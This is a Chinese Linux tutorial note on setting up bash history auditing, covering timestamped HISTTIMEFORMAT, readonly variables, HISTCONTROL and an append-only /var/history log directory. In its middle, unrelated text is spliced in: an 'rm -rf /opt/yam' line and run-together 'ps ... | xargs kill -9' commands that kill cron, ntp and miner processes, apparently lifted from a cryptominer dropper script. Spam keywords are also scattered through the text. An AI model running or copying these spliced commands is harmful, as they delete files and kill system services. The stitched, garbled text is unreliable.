可設置history命令顯示的歷史記錄條目關(guān)聯(lián)的時間戳輸出格式
例:readonly HISTTIMEFORMAT="%F %T `who -u am i 2>/dev/null| awk '{print $NF}'|sed -e 's/[{}]//g' ` `whoami ` "
history命令輸出為:
[bei@localhost ~]$ history | tail -5
2188 2018-09-18 20:22:14 (192.168.20.xxx) bei history
2189 2018-09-18 20:22:21 (192.168.20.xxx) bei ifconfig
2190 2018-09-18 20:22:49 (192.168.20.xxx) bei cat -n /var/history/bei-507.log | tail -5
2191 2018-09-18 20:27:45 (192.168.20.xxx) bei history | tail -10
2192 2018-09-18 20:27:51 (192.168.20.xxx) bei history | tail -5
HISTCONTROL
控制命令在歷史列表中記錄方式
ignorespace:以空格開頭的行不會記錄在歷史中
ignoredups:忽略重復的命令
ignoreboth:參數(shù)ignorespace和ignoredups同時生效
關(guān)于readonly
變量前寫上readonlylinux命令,非root用戶變量不可更改
>>>創(chuàng)建目錄/var/history ——> mkdir /var/history
給目錄/var/history賦予所有人的寫權(quán)限 ——> chmod a+w /var/history
給目錄/var/history賦予特殊屬性a ——> chattr +a /var/history
>>>編輯/etc/profile修改shell命令記錄的參數(shù)
readonly HISTFILE=/var/history/$USER-$UID.log #設置保存命令歷史記錄的路徑及文件名稱
readonly HISTSIZE=null
readonly HISTFILESIZE=500000
awk---grep---sed [root@book class]# df -k | awk '{print $1}' | grep -v 'none' | sed s"/\/dev\///g"。netstat -ant | awk '{print $nf}' | grep -v '[a-z]' | sort | uniq -c。 then rm -rf /opt/yamfips auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "mine。
shopt -s histappend #一個用戶可以同時打開多個終端
readonly PROMPT_COMMAND="history -a" #實時追加當前歷史命令到history文件
if [ "$HISTCONTROL" = "ignorespace" ] ; then
export HISTCONTROL=ignoreboth
else
export HISTCONTROL=ignoredups
fi
export HISTSIZE HISTCONTROL
說明:
>>>以上內(nèi)容是本人學習的總結(jié)
>>>如還有錯誤,請留言linux命令,指正